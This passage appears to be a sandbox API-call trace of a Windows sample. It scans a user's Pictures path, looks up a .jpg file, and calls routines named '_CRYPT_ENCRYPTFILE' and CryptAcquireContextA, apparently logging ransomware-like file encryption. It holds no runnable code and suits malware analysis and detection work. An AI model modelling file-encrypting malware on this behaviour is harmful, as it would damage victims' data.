HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hluVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="luVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uVFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VFFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FFklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fklat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="klat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lat\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="at\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TvBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vBEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BEt HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Et HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HM8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.750] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.751] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KLbxN.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0188.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0188.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0188.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0188.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0188.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0188.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0188.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0188.751] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0188.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0188.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0188.751] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0188.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0188.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.751] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.751] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.751] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.751] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0188.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0188.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0188.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0188.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0188.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0188.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0188.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0188.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0188.752] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe325e90, ftCreationTime.dwHighDateTime=0x1d5d907, ftLastAccessTime.dwLowDateTime=0x67965860, ftLastAccessTime.dwHighDateTime=0x1d5e2b2, ftLastWriteTime.dwLowDateTime=0x67965860, ftLastWriteTime.dwHighDateTime=0x1d5e2b2, nFileSizeHigh=0x0, nFileSizeLow=0x113c3, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="3TvBEt HM8KLbxN.jpg", cAlternateFileName="3TVBET~1.JPG")) returned 0x90ae18 [0188.752] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0188.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0188.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0188.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0188.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.752] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0188.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0188.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0188.752] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0188.752] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0188.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0188.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0188.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0188.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0188.753] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0188.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0188.754] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0188.754] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.754] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0188.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0188.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0188.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0188.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0188.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0188.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0188.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0188.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0188.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0188.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0188.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0188.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0188.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0188.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0188.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0188.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0188.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0188.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0188.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0188.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0188.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0188.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0188.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0188.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0188.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0188.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0188.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0188.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0188.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: 